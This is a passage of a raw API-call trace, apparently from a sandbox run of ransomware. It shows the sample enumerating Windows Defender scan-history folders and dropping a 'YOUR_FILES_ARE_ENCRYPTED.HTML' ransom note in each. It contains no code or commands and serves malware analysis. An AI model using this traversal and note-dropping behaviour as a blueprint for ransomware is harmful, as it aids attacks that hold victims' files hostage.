returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05" [0110.290] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\*" [0110.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2c52be, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.290] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2c52be, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.290] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="191", cAlternateFileName="")) returned 1 [0110.290] StrStrIW (lpFirst="191", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.290] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\191") returned 87 [0110.290] PathFindExtensionW (pszPath="191") returned="" [0110.290] lstrlenW (lpString="") returned 0 [0110.290] PathFindExtensionW (pszPath="191") returned="" [0110.290] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="199", cAlternateFileName="")) returned 1 [0110.290] StrStrIW (lpFirst="199", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.290] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\199") returned 87 [0110.290] PathFindExtensionW (pszPath="199") returned="" [0110.290] lstrlenW (lpString="") returned 0 [0110.290] PathFindExtensionW (pszPath="199") returned="" [0110.290] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="317", cAlternateFileName="")) returned 1 [0110.290] StrStrIW (lpFirst="317", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.291] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\317") returned 87 [0110.291] PathFindExtensionW (pszPath="317") returned="" [0110.291] lstrlenW (lpString="") returned 0 [0110.291] PathFindExtensionW (pszPath="317") returned="" [0110.291] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2c52be, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2c52be, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2c8d44, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.291] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2c52be, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2c52be, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2c8d44, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.291] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.291] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.291] GetProcessHeap () returned 0x600000 [0110.291] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\05\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.291] GetProcessHeap () returned 0x600000 [0110.291] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.291] GetProcessHeap () returned 0x600000 [0110.291] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.292] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="07", cAlternateFileName="")) returned 1 [0110.292] StrStrIW (lpFirst="07", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.292] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07") returned 83 [0110.292] GetProcessHeap () returned 0x600000 [0110.293] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.294] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07" [0110.294] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\*" [0110.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2d1780, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.295] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2d1780, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.295] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="273", cAlternateFileName="")) returned 1 [0110.295] StrStrIW (lpFirst="273", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.295] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\273") returned 87 [0110.295] PathFindExtensionW (pszPath="273") returned="" [0110.295] lstrlenW (lpString="") returned 0 [0110.295] PathFindExtensionW (pszPath="273") returned="" [0110.295] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2d1780, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2d1780, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2d5295, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.295] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2d1780, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2d1780, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2d5295, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.295] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.295] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.295] GetProcessHeap () returned 0x600000 [0110.295] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\07\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.296] GetProcessHeap () returned 0x600000 [0110.296] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.296] GetProcessHeap () returned 0x600000 [0110.296] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.297] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="09", cAlternateFileName="")) returned 1 [0110.297] StrStrIW (lpFirst="09", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.297] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09") returned 83 [0110.297] GetProcessHeap () returned 0x600000 [0110.297] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.298] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09" [0110.298] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\*" [0110.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2e13d2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.299] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2e13d2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.299] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="287", cAlternateFileName="")) returned 1 [0110.299] StrStrIW (lpFirst="287", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.299] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\287") returned 87 [0110.299] PathFindExtensionW (pszPath="287") returned="" [0110.299] lstrlenW (lpString="") returned 0 [0110.299] PathFindExtensionW (pszPath="287") returned="" [0110.299] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2e04fd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2e04fd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2e3c2e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.299] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2e04fd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2e04fd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2e3c2e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.299] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.299] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.299] GetProcessHeap () returned 0x600000 [0110.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\09\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.300] GetProcessHeap () returned 0x600000 [0110.300] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.300] GetProcessHeap () returned 0x600000 [0110.300] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.301] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="10", cAlternateFileName="")) returned 1 [0110.301] StrStrIW (lpFirst="10", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.301] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10") returned 83 [0110.301] GetProcessHeap () returned 0x600000 [0110.301] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.302] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10" [0110.302] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\*" [0110.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2ed76f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.302] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2ed76f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.302] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="197", cAlternateFileName="")) returned 1 [0110.302] StrStrIW (lpFirst="197", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.302] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\197") returned 87 [0110.302] PathFindExtensionW (pszPath="197") returned="" [0110.302] lstrlenW (lpString="") returned 0 [0110.302] PathFindExtensionW (pszPath="197") returned="" [0110.302] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="267", cAlternateFileName="")) returned 1 [0110.302] StrStrIW (lpFirst="267", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.302] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\267") returned 87 [0110.302] PathFindExtensionW (pszPath="267") returned="" [0110.302] lstrlenW (lpString="") returned 0 [0110.303] PathFindExtensionW (pszPath="267") returned="" [0110.303] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="286", cAlternateFileName="")) returned 1 [0110.303] StrStrIW (lpFirst="286", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.303] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\286") returned 87 [0110.303] PathFindExtensionW (pszPath="286") returned="" [0110.303] lstrlenW (lpString="") returned 0 [0110.303] PathFindExtensionW (pszPath="286") returned="" [0110.303] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2ed76f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2ed76f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2f129c, 